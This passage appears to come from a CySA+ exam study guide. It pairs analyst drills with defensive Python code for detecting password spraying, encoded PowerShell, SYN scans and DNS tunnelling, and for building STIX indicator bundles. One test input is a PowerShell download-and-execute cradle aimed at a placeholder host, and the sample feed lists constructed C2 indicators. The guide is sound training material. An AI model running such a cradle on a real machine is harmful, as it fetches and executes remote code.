2.5 Practice Drills and Readiness Markers
Key Takeaways
- Readiness means you can classify any artifact — log, packet, process — and name the ATT&CK technique and next step.
- Drill log/packet reading until classification is reflexive; PBQs are timed and evidence-dense.
- Threat intelligence sharing standards (STIX/TAXII) and IoC types are quick, high-yield recall wins.
- A domain is ready only when mixed, unlabeled scenarios stay stable after a one-day break.
Security Operations is Domain 1.0 of CS0-003 and carries 33% of the exam weight, and its performance-based questions (PBQs) have to be solved against the exam clock, so readiness is measured by speed and accuracy reading real artifacts, not by recognition of definitions. Build drills that force active recall under a clock.
Drill 1: Artifact-to-technique flashcards
Make a two-column sheet. Left column: an artifact. Right column: the indicator, the MITRE ATT&CK tactic/technique, and the next analytic step.
| Artifact (left) | Classification + next step (right) |
|---|---|
| Burst of Event ID 4625 (failed logon) across many accounts from one source | Password spraying (T1110.003) → correlate with any 4624 (successful logon) from the same source |
| `powershell -enc <long base64 string>` | PowerShell (T1059.001) → decode the UTF-16LE base64 payload, check the 4688 parent process |
| Outbound HTTPS at fixed 60 s intervals | C2 beaconing (T1071.001) → check domain age/reputation |
| lsass.exe memory read by a non-system process | Credential dumping (T1003.001) → isolate, capture memory |
| Untouched honeytoken account just used | Confirmed intruder → escalate to incident response |
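The three log-based rows of the sheet as detection logic, added here as an illustrative example and not part of the original drill. The event records, timestamps and command line are constructed; the thresholds (five accounts inside two minutes, 10% interval jitter, five connections) are this example's own choices, not exam values.

```python
"""Drill 1 as code: classify constructed telemetry into ATT&CK techniques."""
import base64
import statistics
from collections import defaultdict

# Constructed Windows Security events (seconds since start, event ID, source, account).
EVENTS = [
    {"t": 0,  "id": 4625, "src": "10.0.0.7", "user": "alice"},
    {"t": 5,  "id": 4625, "src": "10.0.0.7", "user": "bob"},
    {"t": 9,  "id": 4625, "src": "10.0.0.7", "user": "carol"},
    {"t": 14, "id": 4625, "src": "10.0.0.7", "user": "dave"},
    {"t": 20, "id": 4625, "src": "10.0.0.7", "user": "erin"},
    {"t": 25, "id": 4624, "src": "10.0.0.7", "user": "erin"},   # the guess that landed
    {"t": 30, "id": 4625, "src": "10.0.0.9", "user": "alice"},  # one typo, not a spray
]

# Constructed encoded command: PowerShell expects base64 of UTF-16LE text after -enc.
PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
CMDLINE = "powershell.exe -NoP -W Hidden -enc " + base64.b64encode(PLAINTEXT.encode("utf-16-le")).decode()

# Constructed outbound-connection timestamps (seconds) for two hosts.
BEACON_TS = [0, 60, 121, 180, 240, 299, 360, 420]   # 60 s with +/-1 s jitter
BROWSING_TS = [0, 3, 40, 41, 90, 300, 302, 310]      # bursty, human-driven


def find_password_spray(events, min_accounts=5, window_s=120):
    """Row 1: burst of 4625 from one source across many accounts -> T1110.003.
    Also performs the drill's next step: list any 4624 from the same source
    after the burst began."""
    failures = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            failures[e["src"]].append(e)
    hits = {}
    for src, recs in failures.items():
        recs.sort(key=lambda r: r["t"])
        for i, first in enumerate(recs):
            in_window = [r for r in recs[i:] if r["t"] - first["t"] <= window_s]
            accounts = sorted({r["user"] for r in in_window})
            if len(accounts) >= min_accounts:
                success = sorted({e["user"] for e in events
                                  if e["id"] == 4624 and e["src"] == src and e["t"] >= first["t"]})
                hits[src] = {"technique": "T1110.003", "accounts": accounts, "success": success}
                break
    return hits


def decode_encoded_command(cmdline):
    """Row 2: powershell -enc <b64> -> T1059.001. Returns the decoded script or None.
    Accepts the -e/-ec/-enc/-encodedcommand spellings PowerShell itself accepts."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower().lstrip("-/")
        if flag in ("e", "ec") or (len(flag) >= 3 and "encodedcommand".startswith(flag)):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def score_beacon(timestamps, max_jitter=0.10, min_connections=5):
    """Row 3: outbound connections at a fixed interval -> T1071 beaconing.
    Jitter is the population std-dev of the gaps divided by their median."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if not gaps or len(gaps) + 1 < min_connections:
        return None
    median = statistics.median(gaps)
    jitter = statistics.pstdev(gaps) / median if median else float("inf")
    return {"interval_s": median, "jitter": round(jitter, 3),
            "technique": "T1071" if jitter <= max_jitter else None}


if __name__ == "__main__":
    print(find_password_spray(EVENTS))
    print(decode_encoded_command(CMDLINE))
    print(score_beacon(BEACON_TS), score_beacon(BROWSING_TS))
```

Run it and compare the output with the right-hand column of the sheet: the spray detector returns the account list and the one success to chase, the decoder returns the plaintext that the 4688 parent check would be run against, and the beacon scorer returns the interval and a near-zero jitter for the implant versus no finding for the browsing host.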
Drill 2: Threat-intelligence quick recall
These are cheap points if memorized:
- STIX (Structured Threat Information eXpression) is the format for describing threat data (in STIX 2.x, JSON objects such as indicators, malware, and attack patterns); TAXII (Trusted Automated eXchange of Intelligence Information) is the HTTPS-based transport that shares it, organized into API roots and collections.
- Indicators of compromise (IoCs): file hashes, IP addresses, domains, URLs, registry keys, mutexes. The Pyramid of Pain ranks how costly each is for an attacker to change — hashes are trivial, TTPs are hardest.
- Threat actor types: nation-state/APT, organized crime, hacktivist, insider, script kiddie — each with different motivation and sophistication.
- Threat hunting is proactive: you form a hypothesis ("an adversary is using scheduled tasks for persistence") and search telemetry for it, rather than waiting for an alert.
Drill 3: Timed packet/log reading
In Wireshark or a log excerpt, practice answering in under 30 seconds: what protocol, what source and destination, what is abnormal. Learn the Wireshark display filters that save time: `http.request`, `dns`, `ip.addr == x.x.x.x`, `tcp.flags.syn == 1 && tcp.flags.ack == 0` (SYN set, ACK clear, to spot half-open scan attempts), and `frame contains "string"` for string hunting. In tcpdump, recognize `-n` (no name resolution), `-X` (hex and ASCII payload), and a basic host/port filter such as `tcpdump -n host 10.0.0.5 and port 443`. PBQs supply dense data and reward analysts who triage fast and resist getting lost in irrelevant packets.
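The SYN-without-ACK filter applied by hand, as an added example that is not part of the original drill: a minimal IPv4/TCP header parser, the Wireshark expression `tcp.flags.syn == 1 && tcp.flags.ack == 0` as a function, and a grouping step that turns "many SYN-only packets from one source to many ports" into a scan finding. The packets are constructed in the block (no Ethernet header, zero checksums, documentation and private addresses); the ten-port threshold is this example's choice.

```python
"""Drill 3 as code: the SYN-only display filter applied to constructed IPv4/TCP packets."""
import socket
import struct
from collections import defaultdict

TCP_SYN, TCP_ACK = 0x02, 0x10


def build_packet(src, dst, sport, dport, flags):
    """Constructed IPv4+TCP packet (no Ethernet header, zero checksums): test input only."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip + tcp


def parse_packet(raw):
    """Decode the IPv4 and TCP headers; returns None for non-TCP or truncated input."""
    if len(raw) < 20:
        return None
    ver_ihl, _, _, _, _, ttl, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or proto != 6 or len(raw) < ihl + 20:
        return None
    sport, dport, _, _, _, flags, _, _, _ = struct.unpack("!HHIIBBHHH", raw[ihl:ihl + 20])
    return {"src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
            "sport": sport, "dport": dport, "flags": flags, "ttl": ttl}


def syn_only(pkt):
    """Wireshark equivalent: tcp.flags.syn == 1 && tcp.flags.ack == 0"""
    return bool(pkt["flags"] & TCP_SYN) and not pkt["flags"] & TCP_ACK


def summarize(pkt):
    """One-line triage answer: protocol, endpoints, flags (what the 30-second drill asks)."""
    names = [n for n, bit in (("S", TCP_SYN), ("A", TCP_ACK)) if pkt["flags"] & bit]
    return f"TCP {pkt['src']}:{pkt['sport']} -> {pkt['dst']}:{pkt['dport']} [{''.join(names)}]"


def find_syn_scans(raw_packets, min_ports=10):
    """Group SYN-only packets by (src, dst); many distinct ports from one source = scan."""
    ports = defaultdict(set)
    for pkt in filter(None, map(parse_packet, raw_packets)):
        if syn_only(pkt):
            ports[(pkt["src"], pkt["dst"])].add(pkt["dport"])
    return {pair: sorted(p) for pair, p in ports.items() if len(p) >= min_ports}


# Constructed capture: one normal three-way handshake plus a SYN sweep of 20 ports.
CAPTURE = [
    build_packet("10.0.0.8", "10.0.0.5", 51000, 443, TCP_SYN),
    build_packet("10.0.0.5", "10.0.0.8", 443, 51000, TCP_SYN | TCP_ACK),
    build_packet("10.0.0.8", "10.0.0.5", 51000, 443, TCP_ACK),
] + [build_packet("192.0.2.10", "10.0.0.5", 40000 + p, p, TCP_SYN) for p in range(20, 40)]


if __name__ == "__main__":
    for raw in CAPTURE[:3]:
        print(summarize(parse_packet(raw)))
    print(find_syn_scans(CAPTURE))
```

The legitimate client's first packet is also SYN-only, which is why the filter alone is a triage aid, not a verdict: the scan is the source that sends SYNs to many ports and never completes a handshake.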
Drill 4: Attack-surface and hunting hypotheses
Threat hunting (objective 1.4) is hypothesis-driven, so practice writing testable hypotheses tied to ATT&CK and then naming the telemetry that proves or disproves each. Examples: "An adversary established persistence via a new service (T1543.003)" → query for service-creation events (Windows System log 7045, Security log 4697); "Credential theft occurred (T1003.001)" → query for non-system processes opening lsass.exe (Sysmon Event ID 10, ProcessAccess); "C2 is hiding in DNS (T1071.004)" → analyze query-name entropy and TXT volume. Pair this with attack surface management thinking: externally exposed services, unpatched internet-facing apps, and shadow IT are where hunts often start.
A hunt that finds nothing still has value: it builds detections and shrinks future uncertainty.
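The third hypothesis carried through to a query, added here as an example and not part of the original text: per-client entropy of the leftmost DNS label, label length, and TXT share over a constructed resolver log. The log lines, the tunnel labels (base32 of a hash, standing in for encoded exfil chunks) and the thresholds are all this example's assumptions; a real hunt would set them from the environment's own baseline.

```python
"""Hunt hypothesis 'C2 is hiding in DNS' run over constructed resolver logs."""
import base64
import hashlib
import math
from collections import Counter, defaultdict


def shannon_entropy(text):
    """Bits per character: 0.0 for one repeated symbol, log2(n) for n distinct, uniform symbols."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def _tunnel_label(i):
    """Constructed stand-in for an encoded exfil chunk (base32, as DNS tunnels commonly use)."""
    digest = hashlib.sha256(f"chunk{i}".encode()).digest()
    return base64.b32encode(digest).decode().lower().rstrip("=")


# Constructed DNS query log: (client, query type, name).
DNS_LOG = [
    ("10.0.0.12", "A", "www.example.com"),
    ("10.0.0.12", "A", "mail.example.com"),
    ("10.0.0.12", "TXT", "_dmarc.example.com"),     # legitimate TXT lookup
    ("10.0.0.12", "AAAA", "updates.example.com"),
    ("10.0.0.31", "A", "www.example.com"),
] + [("10.0.0.31", "TXT", f"{_tunnel_label(i)}.t.example.invalid") for i in range(6)]


def hunt_dns_tunnel(log, min_label_len=30, min_entropy=3.0, min_txt_ratio=0.5):
    """Flag clients whose queries carry long, high-entropy leftmost labels and whose
    TXT share is unusually high. Thresholds are this example's choices, not exam
    values; tune them against your own baseline."""
    per_client = defaultdict(lambda: {"queries": 0, "txt": 0, "suspicious": []})
    for client, qtype, name in log:
        stats = per_client[client]
        stats["queries"] += 1
        if qtype == "TXT":
            stats["txt"] += 1
        label = name.split(".")[0]
        if len(label) >= min_label_len and shannon_entropy(label) >= min_entropy:
            stats["suspicious"].append(name)
    findings = {}
    for client, stats in per_client.items():
        txt_ratio = stats["txt"] / stats["queries"]
        if stats["suspicious"] and txt_ratio >= min_txt_ratio:
            findings[client] = {"technique": "T1071.004", "txt_ratio": round(txt_ratio, 2),
                                "examples": stats["suspicious"][:3]}
    return findings


if __name__ == "__main__":
    for client, finding in hunt_dns_tunnel(DNS_LOG).items():
        print(client, finding)
```

The benign client makes one TXT query (a DMARC lookup) with a short label and is not flagged; the tunnelling client is flagged on both signals. Either signal alone produces false positives (CDNs use long labels, mail servers make TXT lookups), which is why the hypothesis names two pieces of telemetry.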
Readiness markers
| Marker | What "ready" looks like |
|---|---|
| Classification speed | Identify an artifact's indicator in under 30 seconds |
| ATT&CK mapping | Name the tactic and technique without the cheat sheet |
| Tool selection | Pick the right visibility source (cloud/host/network) reflexively |
| Distractor control | Explain why a familiar-but-wrong term does not fit the telemetry |
| Retention | Score stable on mixed, unlabeled scenarios after a one-day break |
You are ready for Domain 1.0 when you can take a scenario with no domain label, read the evidence, name the technique, choose the next step, and explain why the other options fail — and still do it after a day away from the material.
Drill 5: IoC and Pyramid-of-Pain recall
The Pyramid of Pain explains why some indicators matter more. From easiest-for-the-attacker-to-change to hardest: hash values → IP addresses → domain names → network/host artifacts → tools → tactics, techniques, and procedures (TTPs). Hunting on hashes catches yesterday's sample; detecting on TTPs forces attackers to rebuild their playbook and delivers durable defense. Drill yourself to place a given indicator on the pyramid and to explain its detection value.
Pair this with the Diamond Model of intrusion analysis (adversary, capability, infrastructure, victim) and the Cyber Kill Chain (reconnaissance, weaponization, delivery, exploitation, installation, command and control, actions on objectives); CySA+ may ask which framework best describes a given analytic goal: ATT&CK for behavior mapping, the kill chain for staged phases, the Diamond Model for relating the four core features of an event.
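Drill 2 and Drill 5 together in code, added here as an example and not part of the original text: a minimal STIX 2.1 bundle with one Indicator per IoC (the shape a TAXII 2.1 collection's objects endpoint hands back), and the receiving side's work of pulling each observable out of the pattern and placing it on the Pyramid of Pain. The object layout, required properties and pattern syntax follow the STIX 2.1 specification; the indicator values are constructed placeholders (the SHA-256 is that of an empty file, the addresses are documentation ranges), the `PYRAMID` table is this example's reading of the pyramid rather than any STIX field, and the pattern parser handles only simple comparison expressions.

```python
"""Build a STIX 2.1 bundle of indicators and place each IoC on the Pyramid of Pain."""
import json
import re
import uuid
from datetime import datetime, timezone

# Pyramid-of-Pain level per STIX cyber-observable type (this example's own mapping).
# TTPs, the top of the pyramid, live in attack-pattern objects, not in indicator patterns.
PYRAMID = {
    "file": (1, "hash value"),
    "ipv4-addr": (2, "IP address"), "ipv6-addr": (2, "IP address"),
    "domain-name": (3, "domain name"),
    "url": (4, "network artifact"), "network-traffic": (4, "network artifact"),
    "windows-registry-key": (4, "host artifact"), "mutex": (4, "host artifact"),
    "software": (5, "tool"),
}

# One comparison expression: <object-type>:<property> = '<value>'
_COMPARISON = re.compile(r"(?P<path>[\w-]+:[\w.'-]+)\s*=\s*'(?P<value>[^']*)'")


def _now():
    """STIX timestamp: RFC 3339 in UTC with millisecond precision and a trailing Z."""
    return datetime.now(timezone.utc).isoformat(timespec="milliseconds").replace("+00:00", "Z")


def make_indicator(pattern, name, indicator_types=("malicious-activity",)):
    """Minimal STIX 2.1 Indicator: every required property plus name and indicator_types."""
    ts = _now()
    return {
        "type": "indicator", "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": ts, "modified": ts,
        "name": name, "indicator_types": list(indicator_types),
        "pattern": pattern, "pattern_type": "stix", "valid_from": ts,
    }


def make_bundle(objects):
    """A bundle is the envelope TAXII 2.1 uses when serving a collection's objects."""
    return {"type": "bundle", "id": f"bundle--{uuid.uuid4()}", "objects": list(objects)}


def extract_iocs(bundle):
    """Receiving side: pull each observable out of the indicator patterns and rank it.
    Handles comparison expressions joined by AND/OR, not the full pattern grammar."""
    iocs = []
    for obj in bundle.get("objects", []):
        if obj.get("type") != "indicator" or obj.get("pattern_type") != "stix":
            continue
        for m in _COMPARISON.finditer(obj["pattern"]):
            otype = m.group("path").split(":")[0]
            level, label = PYRAMID.get(otype, (4, "artifact"))
            iocs.append({"type": otype, "value": m.group("value"),
                         "level": level, "label": label, "indicator": obj["id"]})
    return sorted(iocs, key=lambda i: i["level"])


# Constructed sample feed.
SAMPLE_BUNDLE = make_bundle([
    make_indicator("[file:hashes.'SHA-256' = "
                   "'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855']",
                   "dropper sample"),
    make_indicator("[ipv4-addr:value = '198.51.100.7' OR ipv4-addr:value = '198.51.100.8']",
                   "C2 addresses"),
    make_indicator("[domain-name:value = 'updates.example.invalid']", "C2 domain"),
    make_indicator(r"[windows-registry-key:key = "
                   r"'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\updater']",
                   "persistence key"),
])


if __name__ == "__main__":
    print(json.dumps(SAMPLE_BUNDLE["objects"][0], indent=2))
    for ioc in extract_iocs(SAMPLE_BUNDLE):
        print(f"level {ioc['level']} ({ioc['label']}): {ioc['type']} = {ioc['value']}")
```

The sorted output is the drill's answer key: the hash sits at the bottom (rebuild the binary and it is gone), the addresses and domain above it, and the registry key as a host artifact that costs the attacker a change to their tooling.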
Drill 6: Tool-to-task mapping under pressure
Write a rapid-fire quiz that names a question and demands the tool: "who deleted the cloud storage bucket?" → cloud audit log; "what did this binary do at runtime?" → sandbox/dynamic analysis; "is this host beaconing?" → NetFlow plus EDR; "is this domain malicious?" → threat-intel lookup plus WHOIS age; "what process opened this network connection?" → EDR or netstat/Sysmon. Reflexive tool selection is one of the most reliable signals that you are ready, because it proves you understand which layer holds which evidence rather than guessing from a familiar product name.
Re-run all six drills as a mixed, timed set in your final week and treat any sub-80% block as the area to revisit before test day.
A PowerShell process executes an encoded command that downloads a payload and injects code into a running explorer.exe. Which combination of MITRE ATT&CK techniques is demonstrated?
In a threat-intelligence sharing workflow, what is the relationship between STIX and TAXII?